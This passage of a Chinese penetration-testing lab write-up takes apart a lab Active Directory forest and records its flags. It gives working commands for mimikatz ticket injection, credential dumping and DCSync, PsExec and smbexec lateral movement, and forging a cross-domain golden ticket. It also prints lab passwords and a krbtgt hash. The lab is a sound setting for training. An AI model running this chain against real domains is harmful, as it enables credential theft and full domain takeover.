把生成的票据和mimikatz上传的192.168.51.33的c盘根目录（mimikatz上文已传过了），直接将对应文件复制粘贴即可。

![image-20220531115040000000-1656056185693268.png](http://192.168.79.239/ct/upload/other/ad4e0f63b3905d46476aea2b216a7940.png)

```
#在192.168.51.33中以管理员权限运行mimikatz执行如下命令
kerberos::ptc administrator.ccache
```

![image-20220528130138000000-1656056187405172.png](http://192.168.79.239/ct/upload/other/d39a2326fd635e9e66a689820032091f.png)

把PSTools文件夹里的psexec.exe上传到192.168.51.33，位置：

`C:\Users\Administrator\Desktop\工具\内网渗透\PSTools\PsExec.exe`

执行:

```
PsExec.exe \\KEVIN.bj.jyj.com cmd
```

命令执行后会弹出提示框，agree即可

![image-20220531133930000000-1656056189072816.png](http://192.168.79.239/ct/upload/other/56e91aa5024a262b4fc32185d0d80396.png)

成功获取到KEVIN主机权限

![image-20220528130146000000-1656056190711040.png](http://192.168.79.239/ct/upload/other/662f331c9327e9de42911779c1250450.png)

KEVIN主机的flag文件位置：`c:\users\kevin\desktop\flag.txt`

```
flag{B719-1F1D-4CE7-E019-2E6B-EDAC-CB35-87FB}
```

由于部分工具已经上传到192.168.51.33机器上，现在只需要用文件共享将工具copy到192.168.51.44上即可

```
#刚刚的PsExec横向的shell执行
net use \\192.168.51.33\C$ jason@123 /user:localhost\administrator
net use
```

![image-20220528130156000000-1656056192351919.png](http://192.168.79.239/ct/upload/other/27dd25b8b6dcac62c4e902166d6918d6.png)

```
copy \\192.168.51.33\c$\mimikatz.exe c:\mimikatz.exe
```

![image-20220528130206000000-1656056194022287.png](http://192.168.79.239/ct/upload/other/cb50f25ac28e2b96ecb52f19f7efef01.png)

通过mimikatz进行抓主机密码

```
C:\mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit
```

![image-20220528130216000000-1656056195657984.png](http://192.168.79.239/ct/upload/other/0ef65876c9e2ff27bc0e313805755f7a.png)

![image-20220528130226000000-1656056197285650.png](http://192.168.79.239/ct/upload/other/4b600f33c1b1d418591d12c138dcebf3.png)

获取到域管理员权限

```
         * Username : kevin
         * Domain   : BJ
         * Password : kevin1997..
         
         
		* Username : sysadmin
         * Domain   : BJ
         * Password : KJidkoljlnb#4.
```

##### 任务16：横向移动到域控主机抓取域内所有hash（T1078-利用有效账户凭据、T1555-抓取存储的密码、T1482-域信任发现）

```
python3 smbexec.py bj.jyj.com/sysadmin:KJidkoljlnb#4.@192.168.100.50

#查找信任域
nltest /domain_trusts
```

![image-20220528121222000000-1656056198913940.png](http://192.168.79.239/ct/upload/other/fcee47196c11107cbba12a21ec022f89.png)

DC2主机的flag文件位置：`c:\Users\Administrator\Desktop\flag.txt`

```
flag{B6AB-7C20-AC52-F913-E56E-327A-FD82-1F8A}
```

上传mimikatz到域控主机

```
python3 smbclient.py bj.jyj.com/sysadmin:KJidkoljlnb#4.@192.168.100.50
use c$
put C:\Users\Administrator\Desktop\工具\内网渗透\读取密码\mimikatz\x64\mimikatz.exe
```

![image-20220528130240000000-1656056200493986.png](http://192.168.79.239/ct/upload/other/ff2781f6ce70ba2cdb87192beefb6836.png)

使用之前的smbexec.py，获取域内所有hash，以实际为准。

```
c:\mimikatz.exe "lsadump::dcsync /domain:bj.jyj.com /all /csv" "exit"
```

![image-20220528130010000000-1656056202161162.png](http://192.168.79.239/ct/upload/other/621de59e8f7f041a24c58f6ff2c2d977.png)

##### 任务17：制作SIDHistory 版跨域黄金票据（T1559-进程间通信、T1134-操作访问令牌）

krbtgt上面操作中已获取，目前只需要获取两个域的sid即可

获取域的sid

```
c:\mimikatz.exe "privilege::debug"  "lsadump::trust /patch" "exit"

#Tips：
c:\mimikatz.exe    启动mimikatz
privilege::debug   提升权限
lsadump::trust /patch    指向分别为 域林和子域的SID以及双方的信任密钥
```

![image-20220528130026000000-1656056203842119.png](http://192.168.79.239/ct/upload/other/665a623d3b969929b6d2693b952d0489.png)

获取到的域的sid

```
Current domain: BJ.JYJ.COM (BJ / S-1-5-21-2605018351-88321934-434902429)

Domain: JYJ.COM (JYJ / S-1-5-21-1075525281-2553060978-2115401271)
```

通过使用mimikatz ptt，即可跨到adlab

```
c:\mimikatz.exe "kerberos::golden /domain:BJ.JYJ.COM sids:S-1-5-21-2605018351-88321934-434902429 /sid:S-1-5-21-1075525281-2553060978-2115401271  /krbtgt:9c5b864fb3691b21e29e289027d26342 /user:jyj /ptt" exit 

 domain:当前子域，sid:当前子域SID，sids:信任域的SID，也就是父域，krbtgt:当前域的krbtgt的值，user是trust account，不确定可以使用dcsync在看下。
```

![image-20220528130040000000-1656056205469203.png](http://192.168.79.239/ct/upload/other/28346034455ec4e2ad10b6ebaf4619b4.png)

建立 IPC 连接

随后net use等方式拿下jyj域的域控DC

```sh
net use \\dc1.jyj.com\c$
dir \\dc1.jyj.com\c$
```

![image-20220618175502000000-1656056207132766.png](http://192.168.79.239/ct/upload/other/1ce465abe949d4e35e344c03bd649e92.png)

后续可通过计划任务上线

DC1主机的flag位置：`c:\Users\Administrator\Desktop\flag.txt`

```
flag{9710-42A0-3272-1A49-4A16-638C-30A4-85E8}
```

![image-20220624145445254105-1656056208782172.png](http://192.168.79.239/ct/upload/other/2be56f1f813c6d66976efe1acf836a5b.png)